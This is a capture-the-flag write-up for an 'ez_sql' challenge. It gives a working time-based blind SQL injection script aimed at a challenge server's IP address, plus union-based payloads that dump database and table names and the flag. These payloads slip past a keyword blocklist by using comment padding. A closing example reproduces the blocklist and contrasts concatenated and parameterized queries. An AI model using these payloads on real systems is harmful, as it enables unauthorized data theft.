March 2, 2023

[HNCTF]ez_sql

Unintended solution


The page is a query interface; entering 1:


I had a feeling something was off; testing showed that and, sleep, extractvalue, updatexml, spaces, information, #, and - were all banned.

Testing showed that benchmark(500000,md5('test')) can be used to create a time delay. I tried the payload id=1'/**/or/**/if(2>1,(select/**/benchmark(500000,md5('test'))),1)='1 and observed the delay, so I wrote a blind-injection script:

```python
# Author: @Boogipop
import requests
import time

# Manual delay check used earlier to confirm benchmark() works (not used by the loop below)
payload = "1'/**/or/**/if(2>1,(select/**/benchmark(1500000,md5('test'))),1)='1"
url = 'http://43.143.7.97:28004/index.php'
result = ''
i = 0  # 1-based position of the character currently being extracted
while True:
    # Binary search over the ASCII range for the character at position i
    head = 1
    tail = 127
    i += 1
    while head < tail:
        mid = (head + tail) // 2
        data = {
            # /**/ replaces the banned space; the inner union reads the flag column without naming it
            "id": f"0'/**/or/**/if(ascii(substr((select/**/group_concat(a)/**/from/**/(select/**/(1)a/**/union/**/select/**/*/**/from/**/ctftraining.flag)d),{i},1))>{mid},(select/**/benchmark(500000,md5('test'))),0)='1"
            # Earlier stages: enumerate table names, then database names, via mysql.innodb_table_stats
            # "id": f"1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name='ctftraining'),{i},1))>{mid},(select/**/benchmark(500000,md5('test'))),0)='1"
            # "id": f"1'/**/or/**/if(ascii(substr((select/**/group_concat(database_name)/**/from/**/mysql.innodb_table_stats),{i},1))>{mid},(select/**/benchmark(500000,md5('test'))),0)='1"
        }

        # Time the request: a slow response means the comparison was true
        t1 = time.time()
        r = requests.post(url, data=data)
        t2 = time.time()
        print(t2 - t1)
        if t2 - t1 > 0.3:
            head = mid + 1
        else:
            tail = mid
    if head != 1:
        result += chr(head)
        print(result)
    else:
        # No character found at this position: end of the string
        break
```

Let it run for a while and the flag comes out.

Intended solution

I heard from the big shots that this challenge doesn't actually need blind injection at all; I'm just too dumb, haha. Apparently there is echoed output, so I went back and tested it, and found that this is indeed the case:

After entering id=1'/**/union/**/select/**/1,2,3/**/where/**/1='1 you can see:


There fucking is echoed output. Confirmed: I'm an idiot.

id=1'/**/union/**/select/**/1,2,(select/**/group_concat(database_name)/**/from/**/mysql.innodb_table_stats)/**/where/**/1='1

This dumps the database names; since I had already hit this pitfall, I knew the flag was in a different database:


Continue by dumping the tables:

id=1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name='ctftraining

Finally, just dump the field contents:

id=1'/**/union/**/select/**/1,2,group_concat(`1`)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)a/**/where/**/1='1
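The keyword filter described under the unintended solution and the union payloads above both fail for the same reason: the server concatenates `id` into the query and relies on a blocklist. The following is an added example, not code from the writeup or the challenge; sqlite3 and the `items`/`flag` tables are constructed stand-ins for the challenge's MySQL database, and `BANNED` is an approximation of the filter from the keywords the writeup lists. It shows the blocklist letting a comment-padded union payload through against a concatenated query, while a bound parameter treats the same input as plain data:

```python
import sqlite3

# Approximation of the challenge's filter, built from the keywords the writeup says were banned
# (constructed; the real filter is not on the page).
BANNED = ["and", "sleep", "extractvalue", "updatexml", " ", "information", "#", "-"]

# Union payload in the shape used in the writeup: /**/ stands in for the banned space,
# and the table/column names are the constructed stand-ins below.
UNION_PAYLOAD = "1'/**/union/**/select/**/1,2,(select/**/value/**/from/**/flag)/**/where/**/'1'='1"


def blocklist_allows(value: str) -> bool:
    """True if the naive keyword filter would let the input through unchanged."""
    low = value.lower()
    return not any(token in low for token in BANNED)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema: a public table and a separate flag table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table items(id integer, name text, secret text)")
    conn.execute("insert into items values (1, 'one', 'public')")
    conn.execute("create table flag(value text)")
    conn.execute("insert into flag values ('flag{constructed-sample}')")
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """String concatenation: the input becomes part of the SQL, so comments act as whitespace."""
    sql = f"select id, name, secret from items where id='{user_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """Bound parameter: the input is compared as a value, never parsed as SQL."""
    return conn.execute("select id, name, secret from items where id=?", (user_id,)).fetchall()


def leaked_flag(rows: list) -> bool:
    """True if any returned row carries the flag table's content."""
    return any(row[2] == "flag{constructed-sample}" for row in rows)


if __name__ == "__main__":
    conn = make_db()
    print("filter allows payload:", blocklist_allows(UNION_PAYLOAD))
    print("concatenated query leaks flag:", leaked_flag(vulnerable_lookup(conn, UNION_PAYLOAD)))
    print("parameterized query result:", safe_lookup(conn, UNION_PAYLOAD))
```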


Done~

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#CTF #SQL